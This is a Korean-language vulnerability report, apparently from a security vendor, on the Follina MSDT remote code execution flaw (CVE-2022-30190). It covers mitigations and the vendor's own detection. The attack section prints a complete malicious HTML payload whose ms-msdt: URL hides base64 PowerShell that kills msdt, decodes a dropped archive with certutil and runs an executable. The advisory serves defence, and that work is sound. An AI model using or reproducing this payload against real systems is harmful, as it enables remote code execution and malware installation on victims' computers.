"MS Office Zero-day vulnerability Follina(CVE-2022-30190)" 를 분석하여 TA팀에서 작성한 취약점 보고서입니다.

CVE-2022-30190은 공격자가 악성 Word 문서를 통해 피해자의 시스템에서 임의의 명령을 실행할 수 있도록 허용하는 Microsoft 지원 진단 도구(MSDT)의 원격 코드 실행(RCE) 취약점입니다.

이 취약점을 방지하려면 최신 보안 패치를 적용하고 MSDT 프로토콜을 비활성화하는 것이 중요합니다. 사용자는 출처가 불분명한 문서를 열지 않도록 주의해야 합니다.

1. 개요

해당 취약점은 Microsoft Windows에서 MS Office 문서 처리 기능과 관련된 보안 결함입니다. 이 취약점은 특히 Word 문서를 통해 악성 코드를 실행할 수 있게 하며, 공격자는 피해자의 개입 없이 원격 코드를 실행할 수 있습니다. CVE-2022-30190는 Windows의 Microsoft Support Diagnostic Tool(MSDT)에서 발생하며, 이 취약점을 악용해 공격자는 원격 코드 실행(RCE)을 할 수 있습니다.

출처 : https://www.vicarius.io/vsociety/posts/microsoft-support-diagnostic-tool-remote-code-execution-vulnerability-cve-2022-30190

2. 공격 유형

해당 취약점이 확인된 Word문서에서는 기존에 알려진 방식인 External 태그에 작성된 URL 연결을 통해 취약점을 발생시키는 HTML파일이 다운로드 및 실행되면서 발생하였습니다.

<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-- 중략 --

//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../..//Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

위의 코드가 작성된 word 문서를 공격 대상에게 메일 및 추가 동작으로 전달한 후 해당 문서를 열거나 미리 보기로 볼 때, MSDT가 원격 서버에서 악성 스크립트를 다운로드하고 실행합니다. 이로 인해 공격자는 피해자의 컴퓨터에서 임의의 명령을 실행 할 수 있는 공격입니다.

출처 : https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr

3. 대응

Follina 취약점에 대한 보편 적인 대응 방법은 다음과 같습니다:

1. 보안 패치 적용: Microsoft에서 제공하는 보안 업데이트를 즉시 설치합니다.
2. MSDT 비활성화: 레지스트리 편집기를 사용하여 ms-msdt 프로토콜을 비활성화 합니다.
3. 문서 파일 주의: 출처가 불분명한 문서는 열지 말고, 특히 Word 문서의 미리 보기 기능을 사용하지 않도록 주의합니다.

저희 AIWAF 제품에서는 ms-msdt 과 같은 프로토콜을 탐지하는 316: Command Injection (ms-msdt) 패턴에서 정상 탐지 되고 있습니다.

4. 결론

CVE-2022-30190는 MS Office 사용자들에게 큰 위협이 될 수 있는 취약점입니다. 이 취약점을 방치할 경우 공격자는 원격에서 악성 코드를 실행하여 피해자의 시스템을 장악할 수 있습니다. 따라서 최신 보안 업데이트를 적용하고, MSDT 프로토콜을 비활성화하는 등 보안 조치를 철저히 해야 합니다.

5. 참조

• https://www.vicarius.io/vsociety/posts/microsoft-support-diagnostic-tool-remote-code-execution-vulnerability-cve-2022-30190
• https://asec.ahnlab.com/ko/34919/
• https://blog.naver.com/best_somansa/222839504756